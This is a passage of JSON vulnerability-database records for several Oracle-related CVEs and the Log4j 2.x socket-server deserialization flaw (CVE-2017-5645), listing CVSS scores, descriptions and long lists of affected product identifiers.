"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 4.7}, "published": "2018-01-18T02:29:00", "type": "cve", "title": "CVE-2018-2564", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-2564"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/a:oracle:webcenter_content:11.1.1.9.0"], "id": "CVE-2018-2564", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-2564", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}, "cpe23": ["cpe:2.3:a:oracle:webcenter_content:11.1.1.9.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-12-06T15:14:28", "description": "Vulnerability in the Oracle Business Intelligence Enterprise Edition component of Oracle Fusion Middleware (subcomponent: BI Platform Security). Supported versions that are affected are 12.2.1.2.0 and 12.2.1.3.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Business Intelligence Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Business Intelligence Enterprise Edition accessible data. CVSS 3.0 Base Score 6.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-01-18T02:29:00", "type": "cve", "title": "CVE-2018-2715", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-2715"], "modified": "2020-08-24T17:37:00", "cpe": ["cpe:/a:oracle:business_intelligence:12.2.1.3.0", "cpe:/a:oracle:business_intelligence:12.2.1.2.0"], "id": "CVE-2018-2715", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-2715", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:oracle:business_intelligence:12.2.1.2.0:*:*:*:enterprise:*:*:*", "cpe:2.3:a:oracle:business_intelligence:12.2.1.3.0:*:*:*:enterprise:*:*:*"]}, {"lastseen": "2023-12-06T14:05:46", "description": "Unspecified vulnerability in the Enterprise Manager Ops Center component in Oracle Enterprise Manager Grid Control 12.1.4, 12.2.2, and 12.3.2; the Oracle Health Sciences Information Manager component in Oracle Health Sciences Applications 1.2.8.3, 2.0.2.3, and 3.0.1.0; the Oracle Healthcare Master Person Index component in Oracle Health Sciences Applications 2.0.12, 3.0.0, and 4.0.1; the Oracle Documaker component in Oracle Insurance Applications before 12.5; the Oracle Insurance Calculation Engine component in Oracle Insurance Applications 9.7.1, 10.1.2, and 10.2.2; the Oracle Insurance Policy Administration J2EE and Oracle Insurance Rules Palette components in Oracle Insurance Applications 9.6.1, 9.7.1, 10.0.1, 10.1.2, 10.2.0, and 10.2.2; the Oracle Retail Integration Bus component in Oracle Retail Applications 15.0; the Oracle Retail Order Broker component in Oracle Retail Applications 5.1, 5.2, and 15.0; the Primavera Contract Management component in Oracle Primavera Products Suite 14.2; the Primavera P6 Enterprise Project Portfolio Management component in Oracle Primavera Products Suite 8.2, 8.3, 8.4, 15.1, 15.2, and 16.1; the Oracle Financial Services Analytical Applications Infrastructure component in Oracle Financial Services Applications 8.0.0, 8.0.1, 8.0.2, and 8.0.3; the Oracle Commerce Guided Search / Oracle Commerce Experience Manager component in Oracle Commerce 3.1.1, 3.1.2, 11.0, 11.1, and 11.2; the Oracle Agile PLM component in Oracle Supply Chain Products Suite 9.3.4 and 9.3.5; the Oracle Communications BRM - Elastic Charging Engine 11.2.0.0.0 and 11.3.0.0.0; the Oracle Enterprise Repository Enterprise Repository 12.1.3.0.0; the Oracle Financial Services Behavior Detection Platform 8.0.1 and 8.0.2; the Oracle Hyperion Essbase 12.2.1.1; the Oracle Tuxedo System and Applications Monitor (TSAM) 11.1.1.2.0, 11.1.1.2.1, 11.1.1.2.1, 12.1.1.1.0, 12.1.3.0.0, and 12.2.2.0.0; the Oracle Communications WebRTC Session Controller component of Oracle Communications Applications (subcomponent: Security (Spring)) 7.0, 7.1 and 7.2; the Oracle Endeca Information Discovery Integrator 3.2; the Converged Commerce component of Oracle Retail Applications 16.0.1; the Oracle Identity Manager 11.1.2.3.0; Oracle Enterprise Manager for MySQL Database 12.1.0.4; Oracle Retail Invoice Matching 12.0, 13.0, 13.1, 13.2, 14.0, and 14.1; Oracle Communications Performance Intelligence Center (PIC) Software Prior to 10.2.1 and the Oracle Knowledge component of Oracle Siebel CRM (subcomponent: AnswerFlow (Spring Framework)) version 8.5.1.0 - 8.5.1.7 and 8.6.0 allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-07-21T10:12:00", "type": "cve", "title": "CVE-2016-0635", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0635"], "modified": "2019-04-23T19:29:00", "cpe": ["cpe:/a:oracle:insurance_calculation_engine:10.2.2", "cpe:/a:oracle:insurance_rules_palette:9.7.1", "cpe:/a:oracle:insurance_calculation_engine:10.1.2", "cpe:/a:oracle:primavera_contract_management:14.2", "cpe:/a:oracle:retail_order_broker_cloud_service:15.0", "cpe:/a:oracle:insurance_rules_palette:9.6.1", "cpe:/a:oracle:insurance_rules_palette:10.0.1", "cpe:/a:oracle:insurance_rules_palette:10.1.2", "cpe:/a:oracle:health_sciences_information_manager:1.2.8.3", "cpe:/a:oracle:insurance_policy_administration_j2ee:10.2.2", "cpe:/a:oracle:healthcare_master_person_index:2.0.12", "cpe:/a:oracle:health_sciences_information_manager:2.0.2.3", "cpe:/a:oracle:healthcare_master_person_index:3.0.0", "cpe:/a:oracle:insurance_policy_administration_j2ee:10.1.2", "cpe:/a:oracle:retail_order_broker_cloud_service:5.1", "cpe:/a:oracle:retail_order_broker_cloud_service:5.2", "cpe:/a:oracle:health_sciences_information_manager:3.0.1.0", "cpe:/a:oracle:insurance_policy_administration_j2ee:10.0.1", "cpe:/a:oracle:healthcare_master_person_index:4.0.1", "cpe:/a:oracle:enterprise_manager_ops_center:12.1.4", "cpe:/a:oracle:retail_integration_bus:15.0", "cpe:/a:oracle:primavera_p6_enterprise_project_portfolio_management:8.2", "cpe:/a:oracle:insurance_policy_administration_j2ee:9.7.1", "cpe:/a:oracle:insurance_calculation_engine:9.7.1", "cpe:/a:oracle:enterprise_manager_ops_center:12.3.2", "cpe:/a:oracle:documaker:12.5", "cpe:/a:oracle:primavera_p6_enterprise_project_portfolio_management:15.1", "cpe:/a:oracle:insurance_policy_administration_j2ee:9.6.1", "cpe:/a:oracle:primavera_p6_enterprise_project_portfolio_management:8.3", "cpe:/a:oracle:insurance_rules_palette:10.2.2", "cpe:/a:oracle:primavera_p6_enterprise_project_portfolio_management:15.2", "cpe:/a:oracle:insurance_rules_palette:10.2.0", "cpe:/a:oracle:enterprise_manager_ops_center:12.2.2", "cpe:/a:oracle:insurance_policy_administration_j2ee:10.2.0", "cpe:/a:oracle:primavera_p6_enterprise_project_portfolio_management:16.1", "cpe:/a:oracle:primavera_p6_enterprise_project_portfolio_management:8.4"], "id": "CVE-2016-0635", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0635", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:oracle:insurance_policy_administration_j2ee:10.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:health_sciences_information_manager:3.0.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_rules_palette:9.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_order_broker_cloud_service:15.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_rules_palette:10.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_policy_administration_j2ee:9.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:enterprise_manager_ops_center:12.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:primavera_p6_enterprise_project_portfolio_management:8.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_policy_administration_j2ee:9.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:enterprise_manager_ops_center:12.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_calculation_engine:10.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:health_sciences_information_manager:2.0.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:primavera_p6_enterprise_project_portfolio_management:15.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_policy_administration_j2ee:10.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:healthcare_master_person_index:4.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:primavera_p6_enterprise_project_portfolio_management:8.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:primavera_p6_enterprise_project_portfolio_management:16.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_policy_administration_j2ee:10.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:primavera_contract_management:14.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_policy_administration_j2ee:10.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:primavera_p6_enterprise_project_portfolio_management:15.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:primavera_p6_enterprise_project_portfolio_management:8.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_rules_palette:9.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:enterprise_manager_ops_center:12.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_rules_palette:10.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_rules_palette:10.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:documaker:12.5:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_integration_bus:15.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:health_sciences_information_manager:1.2.8.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:healthcare_master_person_index:3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_calculation_engine:10.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_order_broker_cloud_service:5.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_calculation_engine:9.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:healthcare_master_person_index:2.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_rules_palette:10.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_order_broker_cloud_service:5.1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-12-06T15:22:50", "description": "In Apache Log4j 2.x before 2.8.2, when using the TCP socket server or UDP socket server to receive serialized log events from another application, a specially crafted binary payload can be sent that, when deserialized, can execute arbitrary code.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-04-17T21:59:00", "type": "cve", "title": "CVE-2017-5645", "cwe": ["CWE-502"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5645"], "modified": "2023-11-07T02:49:00", "cpe": ["cpe:/a:oracle:mysql_enterprise_monitor:4.0.4.5235", "cpe:/a:netapp:oncommand_api_services:-", "cpe:/a:oracle:application_testing_suite:13.3.0.1", "cpe:/a:oracle:endeca_information_discovery_studio:3.2.0", "cpe:/a:oracle:policy_automation:12.2.3", "cpe:/a:oracle:retail_extract_transform_and_load:13.0", "cpe:/o:redhat:enterprise_linux:6.0", "cpe:/a:oracle:enterprise_manager_base_platform:13.2.0.0", "cpe:/a:oracle:financial_services_loan_loss_forecasting_and_provisioning:8.0.5", "cpe:/a:oracle:bi_publisher:12.2.1.3.0", "cpe:/a:oracle:enterprise_manager_for_mysql_database:13.2.2.0.0", "cpe:/a:oracle:financial_services_loan_loss_forecasting_and_provisioning:8.0.4", "cpe:/o:redhat:enterprise_linux:6.7", "cpe:/a:oracle:policy_automation:10.4.7", "cpe:/a:netapp:service_level_manager:-", "cpe:/a:oracle:weblogic_server:10.3.6.0.0", "cpe:/a:oracle:soa_suite:12.2.2.0.0", "cpe:/a:oracle:bi_publisher:11.1.1.9.0", "cpe:/a:oracle:rapid_planning:12.2", "cpe:/a:oracle:communications_service_broker:6.0", "cpe:/a:oracle:siebel_ui_framework:18.7", "cpe:/a:oracle:primavera_gateway:16.2.11", "cpe:/a:oracle:timesten_in-memory_database:11.2.2.8.49", "cpe:/a:oracle:policy_automation_for_mobile_devices:12.2.6", "cpe:/a:oracle:retail_integration_bus:16.0", "cpe:/a:oracle:policy_automation:12.2.0", "cpe:/o:redhat:enterprise_linux_server_aus:7.4", "cpe:/a:oracle:flexcube_investor_servicing:12.4.0", "cpe:/a:oracle:autovue_vuelink_integration:21.0.1", "cpe:/o:redhat:enterprise_linux:7.5", "cpe:/a:oracle:policy_automation:12.2.2", "cpe:/a:oracle:enterprise_manager_for_peoplesoft:13.2.1.1", "cpe:/a:oracle:policy_automation_for_mobile_devices:10.4.7", "cpe:/a:oracle:financial_services_profitability_management:8.0.7.0.0", "cpe:/a:oracle:financial_services_behavior_detection_platform:6.1.1", "cpe:/a:oracle:enterprise_manager_for_peoplesoft:13.1.1.1", "cpe:/o:redhat:enterprise_linux_server_eus:7.4", "cpe:/a:oracle:retail_extract_transform_and_load:13.2", "cpe:/a:oracle:insurance_rules_palette:11.0", "cpe:/a:oracle:policy_automation_for_mobile_devices:12.2.5", "cpe:/a:oracle:insurance_calculation_engine:10.2.1", "cpe:/a:oracle:communications_pricing_design_center:12.0", "cpe:/o:redhat:enterprise_linux_server_aus:7.6", "cpe:/a:oracle:policy_automation_for_mobile_devices:12.2.1", "cpe:/o:redhat:enterprise_linux:7.3", "cpe:/a:oracle:enterprise_manager_for_oracle_database:13.2.2", "cpe:/a:oracle:tape_library_acsls:8.4", "cpe:/a:oracle:policy_automation:12.2.7", "cpe:/a:oracle:banking_platform:2.6.0", "cpe:/a:oracle:retail_service_backbone:15.0", "cpe:/a:oracle:insurance_rules_palette:10.0", "cpe:/o:redhat:enterprise_linux_server:7.0", "cpe:/a:oracle:policy_automation_for_mobile_devices:12.2.7", "cpe:/a:oracle:policy_automation_for_mobile_devices:12.1.0", "cpe:/a:oracle:retail_integration_bus:15.0", "cpe:/a:oracle:financial_services_analytical_applications_infrastructure:8.0.7.0.0", "cpe:/a:oracle:identity_analytics:11.1.1.5.8", "cpe:/a:oracle:financial_services_lending_and_leasing:12.5.0", "cpe:/a:oracle:policy_automation:12.2.8", "cpe:/a:oracle:enterprise_manager_for_fusion_middleware:12.1.0.5", "cpe:/a:oracle:jd_edwards_enterpriseone_tools:4.0.1.0", "cpe:/a:oracle:policy_automation_for_mobile_devices:12.2.8", "cpe:/a:oracle:jdeveloper:12.1.3.0.0", "cpe:/a:oracle:policy_automation_for_mobile_devices:12.2.2", "cpe:/a:oracle:policy_automation:12.1.0", "cpe:/a:oracle:policy_automation_for_mobile_devices:12.2.4", "cpe:/a:oracle:insurance_rules_palette:10.2", "cpe:/o:redhat:enterprise_linux_desktop:7.0", "cpe:/o:redhat:enterprise_linux:7.4", "cpe:/a:oracle:instantis_enterprisetrack:17.3", "cpe:/a:oracle:policy_automation:12.2.5", "cpe:/a:oracle:retail_extract_transform_and_load:19.0", "cpe:/a:oracle:enterprise_manager_for_fusion_middleware:13.2.0.0", "cpe:/a:oracle:retail_integration_bus:14.1.0", "cpe:/a:oracle:financial_services_regulatory_reporting_with_agilereporter:8.0.9.2.0", "cpe:/a:oracle:goldengate:12.3.2.1.1", "cpe:/a:oracle:financial_services_analytical_applications_infrastructure:7.3.3.0.2", "cpe:/a:oracle:flexcube_investor_servicing:12.0.4", "cpe:/a:oracle:jd_edwards_enterpriseone_tools:9.2", "cpe:/a:oracle:insurance_policy_administration:10.0", "cpe:/a:oracle:communications_online_mediation_controller:6.1", "cpe:/a:oracle:policy_automation:12.1.1", "cpe:/a:oracle:banking_platform:2.6.2", "cpe:/a:oracle:policy_automation:12.2.9", "cpe:/a:oracle:soa_suite:12.2.1.3.0", "cpe:/a:oracle:autovue_vuelink_integration:21.0.0", "cpe:/a:oracle:communications_instant_messaging_server:10.0.1.3.0", "cpe:/o:redhat:enterprise_linux_server_tus:7.4", "cpe:/a:oracle:utilities_advanced_spatial_and_operational_analytics:2.7.0.1", "cpe:/a:netapp:snapcenter:-", "cpe:/a:oracle:communications_interactive_session_recorder:6.2", "cpe:/o:redhat:enterprise_linux_server_tus:7.6", "cpe:/a:oracle:retail_open_commerce_platform:6.0.0", "cpe:/a:oracle:communications_pricing_design_center:11.1", "cpe:/a:oracle:communications_converged_application_server_-_service_controller:6.1", "cpe:/a:oracle:siebel_ui_framework:18.8", "cpe:/a:oracle:in-memory_performance-driven_planning:12.2", "cpe:/a:oracle:fusion_middleware_mapviewer:12.2.1.3", "cpe:/a:oracle:financial_services_hedge_management_and_ifrs_valuations:8.0.4", "cpe:/a:oracle:policy_automation_for_mobile_devices:12.2.10", "cpe:/o:redhat:enterprise_linux:7.6", "cpe:/a:oracle:in-memory_performance-driven_planning:12.1", "cpe:/a:oracle:policy_automation_for_mobile_devices:12.2.3", "cpe:/o:redhat:enterprise_linux_server_eus:7.6", "cpe:/a:oracle:retail_advanced_inventory_planning:15.0", "cpe:/a:oracle:insurance_policy_administration:10.2", "cpe:/a:oracle:siebel_ui_framework:18.9", "cpe:/a:oracle:retail_open_commerce_platform:6.0.1", "cpe:/a:oracle:financial_services_hedge_management_and_ifrs_valuations:8.0.5", "cpe:/a:oracle:goldengate_application_adapters:12.3.2.1.1", "cpe:/a:oracle:weblogic_server:14.1.1.0.0", "cpe:/a:oracle:insurance_calculation_engine:10.1.1", "cpe:/a:oracle:enterprise_manager_base_platform:12.1.0.5", "cpe:/a:oracle:retail_open_commerce_platform:5.3.0", "cpe:/a:oracle:identity_management_suite:11.1.2.3.0", "cpe:/a:oracle:configuration_manager:12.1.2.0.5", "cpe:/a:oracle:flexcube_investor_servicing:12.3.0", "cpe:/a:oracle:api_gateway:11.1.2.4.0", "cpe:/a:oracle:soa_suite:12.1.3.0.0", "cpe:/a:oracle:policy_automation_for_mobile_devices:12.2.9", "cpe:/a:oracle:policy_automation_for_mobile_devices:12.2.0", "cpe:/a:netapp:oncommand_workflow_automation:-", "cpe:/a:oracle:peoplesoft_enterprise_fin_install:9.2", "cpe:/a:oracle:utilities_work_and_asset_management:1.9.1.2.12", "cpe:/a:oracle:insurance_rules_palette:10.1", "cpe:/a:oracle:policy_automation:12.2.4", "cpe:/a:oracle:financial_services_lending_and_leasing:14.8.0", "cpe:/a:oracle:weblogic_server:12.2.1.3.0", "cpe:/a:oracle:policy_automation:12.2.6", "cpe:/a:oracle:financial_services_profitability_management:6.1.1", "cpe:/a:oracle:financial_services_behavior_detection_platform:8.0.4.0.0", "cpe:/a:oracle:retail_advanced_inventory_planning:14.0", "cpe:/a:oracle:policy_automation_for_mobile_devices:12.1.1", "cpe:/o:redhat:enterprise_linux_workstation:7.0", "cpe:/a:oracle:policy_automation_connector_for_siebel:10.4.6", "cpe:/a:netapp:storage_automation_store:-", "cpe:/a:oracle:flexcube_investor_servicing:14.0.0", "cpe:/a:oracle:policy_automation:12.2.10", "cpe:/a:oracle:mysql_enterprise_monitor:8.0.0.8131", "cpe:/a:oracle:retail_predictive_application_server:15.0.3", "cpe:/a:oracle:mysql_enterprise_monitor:3.4.7.4297", "cpe:/a:oracle:flexcube_investor_servicing:12.1.0", "cpe:/a:oracle:insurance_policy_administration:11.0", "cpe:/a:oracle:configuration_manager:12.1.2.0.2", "cpe:/a:oracle:jdeveloper:12.2.1.3.0", "cpe:/o:redhat:enterprise_linux_server_eus:7.5", "cpe:/a:oracle:retail_integration_bus:14.0.0", "cpe:/a:oracle:identity_management_suite:12.2.1.3.0", "cpe:/a:oracle:bi_publisher:12.2.1.4.0", "cpe:/o:redhat:enterprise_linux:7.0", "cpe:/a:redhat:fuse:1.0", "cpe:/a:oracle:jdeveloper:11.1.1.9.0", "cpe:/a:oracle:retail_extract_transform_and_load:13.1", "cpe:/a:oracle:enterprise_manager_for_oracle_database:12.1.0.8", "cpe:/a:oracle:identity_manager_connector:9.0", "cpe:/a:oracle:banking_platform:2.6.1", "cpe:/a:oracle:policy_automation:12.2.1", "cpe:/a:oracle:retail_service_backbone:16.0", "cpe:/a:oracle:retail_clearance_optimization_engine:14.0.5", "cpe:/a:oracle:primavera_gateway:17.12.7", "cpe:/a:oracle:weblogic_server:12.1.3.0.0", "cpe:/a:oracle:enterprise_data_quality:12.2.1.3.0", "cpe:/a:netapp:oncommand_insight:-", "cpe:/a:oracle:weblogic_server:12.2.1.4.0", "cpe:/a:oracle:fusion_middleware_mapviewer:12.2.1.2", "cpe:/a:oracle:bi_publisher:11.1.1.7.0", "cpe:/a:oracle:communications_network_integrity:7.3.6", "cpe:/a:oracle:retail_service_backbone:14.1", "cpe:/a:oracle:insurance_policy_administration:10.1", "cpe:/a:oracle:rapid_planning:12.1", "cpe:/a:oracle:insurance_rules_palette:11.1"], "id": "CVE-2017-5645", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-5645", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:oracle:financial_services_hedge_management_and_ifrs_valuations:8.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_predictive_application_server:15.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:policy_automation_for_mobile_devices:12.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:7.6:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_integration_bus:15.0:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:service_level_manager:-:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:api_gateway:11.1.2.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:enterprise_manager_for_mysql_database:13.2.2.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:policy_automation:12.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:financial_services_lending_and_leasing:12.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:14.1.1.0.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdeveloper:11.1.1.9.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:policy_automation:12.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:policy_automation:12.2.9:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:fusion_middleware_mapviewer:12.2.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_calculation_engine:10.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:enterprise_manager_for_peoplesoft:13.2.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:in-memory_performance-driven_planning:12.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:timesten_in-memory_database:11.2.2.8.49:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_integration_bus:14.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:flexcube_investor_servicing:12.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:enterprise_manager_base_platform:13.2.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:goldengate_application_adapters:12.3.2.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql_enterprise_monitor:8.0.0.8131:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:enterprise_manager_for_peoplesoft:13.1.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_rules_palette:11.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:flexcube_investor_servicing:12.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:oncommand_workflow_automation:-:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_extract_transform_and_load:13.1:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:identity_manager_connector:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_network_integrity:7.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:12.2.1.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:fusion_middleware_mapviewer:12.2.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_instant_messaging_server:10.0.1.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdeveloper:12.1.3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:soa_suite:12.2.2.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:enterprise_data_quality:12.2.1.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:policy_automation_for_mobile_devices:12.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:configuration_manager:12.1.2.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:rapid_planning:12.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:policy_automation:12.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_policy_administration:10.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:autovue_vuelink_integration:21.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:enterprise_manager_base_platform:12.1.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:financial_services_behavior_detection_platform:8.0.4.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:enterprise_manager_for_oracle_database:13.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:tape_library_acsls:8.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:banking_platform:2.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:policy_automation:12.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_clearance_optimization_engine:14.0.5:*:*:*:*:*:*:*", 